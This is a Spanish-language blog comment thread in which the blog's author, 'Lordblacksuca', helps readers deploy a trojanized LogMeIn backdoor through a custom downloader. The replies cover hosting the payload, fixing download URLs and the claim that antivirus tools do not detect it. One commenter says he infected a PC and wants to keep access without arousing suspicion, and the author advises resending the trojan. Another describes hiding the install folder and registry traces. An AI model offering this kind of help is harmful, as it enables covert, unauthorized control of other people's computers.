    muchas gracias ya logre bajarlo y como dice el tutorial ya le cambie las dos lineas “sSourceUrl =” y “sDestinationUrl =” pero no pasa nada.. lo estuve probando en una maquina virtual con conexión a Internet y nada… inmediatamente ejecuto el downloader aparece un archivo “FirewallOptions.ini” y en el contenido pone:
    [Estado]
    Update=Listo!
    Pero no descarga nada… leí en uno de los anteriores comentarios que aconsejabas probar primero con una imagen ya lo hice y nada, pasa lo mismo, no descarga nada. Que crees que pueda estar pasando, gracias por tu paciencia XD.

  • Reply
    Lordblacksuca
    25 January, 2010 at 2:14 PM

    mmm… deberías asegurarte que la dirección del archivo a descargar esté bien escrita… con http:// etc

    podés probarlo en tu pc sin problemas, siempre y cuando pongas una imagen o un mp3 a descargar cosa que no sea algo que la dañe.

  • Reply
    ivaancrzg
    31 May, 2010 at 4:55 PM

    oyeee disculpaaa Lordblacksuca pero estoy bien weyy en esto y no entiendo nada y pues qeria ver si me puedes explicar detalladamente 🙂 te dejo mi correo es ivanedi_sk@hot… te lo agradeceria demasiado 🙂

  • Reply
    carlos
    15 July, 2010 at 8:22 PM

    amigo una pregunta si logro tener un hosting para lo del downloader tengo que montar un ftp? o con solo tener el hosting puedo subir el paquete autoextraible del logmein, crear el downloader y listo?

  • Reply
    Lordblacksuca
    15 July, 2010 at 10:00 PM

    no, tiene que ser una descarga directa para que funcione el downloader, http://www.algo.com/instalador.exe

  • Reply
    carlos
    21 July, 2010 at 10:54 AM

    donde está el VB de 6MB para descargarlo, puedes darme el link de descarga directa?

  • Reply
    Lordblacksuca
    21 July, 2010 at 12:33 PM

    http://rapidshare.com/files/393862168/Visual_Basic_6.0_2_.exe.html

  • Reply
    msl8902
    23 September, 2010 at 10:31 AM

    MEN PERO RECOMIENDA UN HOST GRATUITO PRA SUBIR EL ARCHIVO

  • Reply
    Wolf
    2 October, 2010 at 8:27 PM

    Men hasta ahora no puedo hacer lo del hosting..e intentado en varias paginas y al final no puedo econtrar la estructura http://www.algo.com/instalador.exe siempre sale clik en descargar pero no me bota el link o no se que estoy haciendo mal men varios tienen ese mismo problema..ojala puedas hacer un tuto..gracias por todo el material dado

  • Reply
    lord
    27 November, 2010 at 11:58 PM

    mi pana como haria yo para lo siguiente; ya infecte una pc pero le cambiaron la contraseña de acceso al ordenador. Entonces hay alguna manera de enviarle algo sencillo q solo le cambie la contraseña nuevamente por una que yo quiera? osea q restrablezca la contraseña. Algo sencillo para no despertar sospechas. AYUDA xfavor

    • Reply
      Lordblacksuca
      28 November, 2010 at 12:09 AM

      mmm, si le cambiaron la contraseña me temo que la unica forma es enviarle el troyano de nuevo, asi el logmein se reinstala.

  • Reply
    lord
    28 November, 2010 at 12:18 AM

    ya eso lo hice hermano y continua igual, tengo 4 meses tratando de solucionar este problema.. que otra sulucion me recomiendas?

  • Reply
    lord
    28 November, 2010 at 12:24 AM

    otro dato que se del ordenador es que intentaron cambiar la ubicacion de los archivos. Osea movieron la carpeta de instalacion. Por tal manera pienso yo que al enviarle de nuevo el programa y reinstalar puede ser que se haya creado un conflicto con las carpetas de archivos duplicados. Porque hace 1 mes (depues de haberle enviado nuevamente el archivo) aceptaba el passw pero luego daba un error la pag. Ahora lo que no me acepta es el password cuando antes si lo hacia. El problema esq no poseo acceso fisico a la pc. Se que debes estar muy ocupado pero agradeceria si podria colaborarme

  • Reply
    Lordblacksuca
    28 November, 2010 at 1:22 AM

    me temo que esa es la unica solucion. trata de enviarselo de nuevo… la unica forma de resetear el password de logmein en con un disco de inicio en modo seguro.. pero eso seria mucho mas complicado si no tienes acceso fisico.

    Yo probaria enviarselo de nuevo otra vez. sino, intenta hacer que formatee le maquina para empezar de cero.

  • Reply
    cesar
    1 December, 2010 at 2:17 PM

    Lord CUANDO saldra el logmein para windows 7. t agradezco por anticipado tu respuesta.

    • Reply
      Lordblacksuca
      1 December, 2010 at 2:28 PM

      Tanto logmein como el troyano funcionan en windows 7

  • Reply
    ROLA
    9 December, 2010 at 5:31 PM

    hola lord desde ya mis felicitaciones por todo esto, bueno hasta ahora me funciono todo, pero quiero hacerte una pregunta, esto del downloader tambien funciona en windows vista y windows 7??? ahh y por cierto los antivirus lo detectan o no, cuando se hace una instalacion desde el downloader. bueno es todo y gracias uan vez mas…

    • Reply
      Lordblacksuca
      9 December, 2010 at 5:43 PM

      Hola, si el downloader funciona en windows vista y windows 7 sin problemas.

      No es detectado por ningun antivirus!

  • Reply
    ROLA
    9 December, 2010 at 9:49 PM

    hola lord, bueno estuve buscando un host gratuito con descarga directa, pero no encuentro ninguna y menos uno al cual se le pueda cargar archivos con mas de 10 megas. favor de recomendarme una. gracias

  • Reply
    Gas
    27 February, 2011 at 6:36 PM

    Lord, acabo de probar el Downloader en VB y anda baaaaarbaro!!! ahora una pregunta, no logro conseguir un hosting gratuito que hostee archivos .exe que tengan el tamaño del logemin troyanizado??? tenes algun dato para darme??? otra opcion es subirlo a mi ftp pero para ello en el Downloader en VB deberia poner user y pass para acceder al archivo en mi ftp en donde se agrega esa linea en el Downloader??. Gracias!!

  • Reply
    Niedmann
    6 March, 2011 at 1:14 AM

    Hola
    Descargue tu backdoor, dejame decirte, super interesante! he estado haciendo algunas modificaciones al batch para eliminar algunas pistas de que el logmein esta instalado, como ocultar la carpeta de instalacion, eliminar otras llaves en el registro que hacian aparecer el programa (bueno, al menos inutilizar la instalacion) ahora mismo estoy tratando de hacer una linea mas que elimine un acceso directo que se crea en documents and settings/all users/inicio/programas/logmein.lnk, ahi voy peleando porque no me lo permite 🙂
    Quisiera tener contacto con vos, para que ayudes a iluminar mi camino 🙂

    Gracias por compartir tus conocimientos!

    • Reply
      Lordblacksuca
      8 March, 2011 at 11:19 PM

      Hola, podes contactarme por FB o twitter, los links estan a la derecha de mi blog.

  • Reply
    mcerrato
    19 August, 2011 at 4:00 PM

    haty un problema

  • Reply
    d03x
    10 February, 2012 at 1:39 AM

    Les recomiendo como FTP el Dropbox es un servicio nuevo para compartir archivos por enlace te da 2 gigas de almacenamiento gratis.
    me gustaria saber si hay otro downloader que pueda modificar desde el block de notas al que solo le cambie la url de descarga que no tengo instalado el VB ahorita.
    que me sugieres lord?

Leave a Reply

Your email address will not be published. Required fields are marked *